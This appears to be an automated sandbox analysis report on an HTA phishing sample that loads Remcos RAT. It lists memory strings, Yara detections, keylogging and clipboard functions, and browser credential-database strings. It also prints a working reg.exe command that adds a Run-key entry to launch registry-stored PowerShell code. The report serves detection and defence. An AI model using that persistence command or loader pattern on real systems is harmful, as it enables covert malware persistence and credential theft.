Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp0
Source: wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpI
Source: wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp_
Source: wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpg
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gprqDS
Source: powershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv5CE7.tmp.16.dr String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comata
Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 00000010.00000002.2643556229.0000000000682000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000003.00000003.2000735992.0000021BB3CE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2643041516.00000000029E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.3.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49734 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 16_2_0041183A
Contains functionality to modify clipboard data
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 16_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 16_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 19_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 19_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 22_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 22_2_004072B5

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_3748.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_2212.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3748, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2212, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\SysWOW64\mshta.exe Process created: Commandline size = 6098
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6098
Source: C:\Windows\SysWOW64\mshta.exe Process created: Commandline size = 6098 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6098 Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0419DC2F Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 10_2_0419DC2F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00401806 NtdllDefWindowProc_W, 16_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004018C0 NtdllDefWindowProc_W, 16_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004016FD NtdllDefWindowProc_A, 19_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004017B7 NtdllDefWindowProc_A, 19_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00402CAC NtdllDefWindowProc_A, 22_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00402D66 NtdllDefWindowProc_A, 22_2_00402D66
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D9CC60 1_2_02D9CC60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D9A16C 1_2_02D9A16C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D90FF3 1_2_02D90FF3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D91044 1_2_02D91044
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D916AD 1_2_02D916AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D9166D 1_2_02D9166D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C9B5C1 10_2_22C9B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22CA7194 10_2_22CA7194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044B040 16_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0043610D 16_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00447310 16_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044A490 16_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040755A 16_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0043C560 16_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044B610 16_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044D6C0 16_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004476F0 16_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044B870 16_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044081D 16_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00414957 16_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004079EE 16_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00407AEB 16_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044AA80 16_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00412AA9 16_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404B74 16_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404B03 16_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044BBD8 16_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404BE5 16_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404C76 16_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00415CFE 16_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00416D72 16_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00446D30 16_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00446D8B 16_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00406E8F 16_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00405038 19_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0041208C 19_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004050A9 19_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040511A 19_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0043C13A 19_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004051AB 19_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00449300 19_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040D322 19_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044A4F0 19_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0043A5AB 19_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00413631 19_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00446690 19_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044A730 19_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004398D8 19_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004498E0 19_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044A886 19_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0043DA09 19_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00438D5E 19_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00449ED0 19_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0041FE83 19_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00430F54 19_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004050C2 22_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004014AB 22_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00405133 22_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004051A4 22_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00401246 22_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_0040CA46 22_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00405235 22_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004032C8 22_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00401689 22_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00402F60 22_2_00402F60
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
Yara signature match
Source: amsi32_3748.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_2212.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3748, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2212, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winHTA@46/25@7/8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 16_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 22_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 16_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 16_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 16_2_0040B58D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Idealogical143.cho Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcaoq430.eu4.ps1 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3748
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2212
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 00000010.00000002.2660982925.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2661558073.0000000004651000.00000004.00000020.00020000.00000000.sdmp, chp6361.tmp.16.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta ReversingLabs: Detection: 54%
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
